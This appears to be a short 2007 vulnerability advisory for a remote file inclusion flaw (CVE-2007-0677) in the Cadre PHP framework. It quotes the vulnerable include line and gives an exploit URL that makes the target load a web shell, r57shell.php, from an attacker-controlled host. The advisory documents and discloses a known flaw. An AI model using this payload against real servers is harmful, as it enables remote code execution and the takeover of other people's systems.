```md ## Cadre Remote File Inclusion Vulnerability - **CVE**: CVE-2007-0677 - **Risk**: High - **CVSS Base Score**: 7.5/10 - **Exploit Range**: Remote - **Impact Subscore**: 6.4/10 - **Availability Impact**: Partial - **Integrity Impact**: Partial ### Vulnerability Details - **Date Found**: 2007-01-31 - **Detected by**: Ahmad Muammarr W.K (a.k.a) y3dlp - **Location**: Indonesia Jakarta - **Critical Level**: Critical - **Applications**: Cadre - **Download Path**: http://ftp.ac.nz/mirrors/gnu/savannah/files/cadre/cadre-2000724.tar.gz ### Description Cadre is a PHP framework for developing large business applications. It currently supports PostgreSQL as the database back end (although this is extendable). ### Vulnerability In class.Quick_Config_Browser.php: ```php include_once($GLOBALS[$config['framework_path']] . "class.Browser.php"); ``` An attacker can exploit this vulnerability with a simple PHP injection script. ### Exploit ```plaintext http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[$config['framework_path']]=http://attacker/r57shell.php%20? ``` ### Shoutout - ~ my lovely ana - ~ str0ke, waraxe, negative - ~ newbie_hacker [at] yahoogroups [dot] com [email concealed] - ~ #e-c-h-o @irc.dal.net ### Contact - y3dips || echo | staff || y3dips[at]gmail[dot]com ```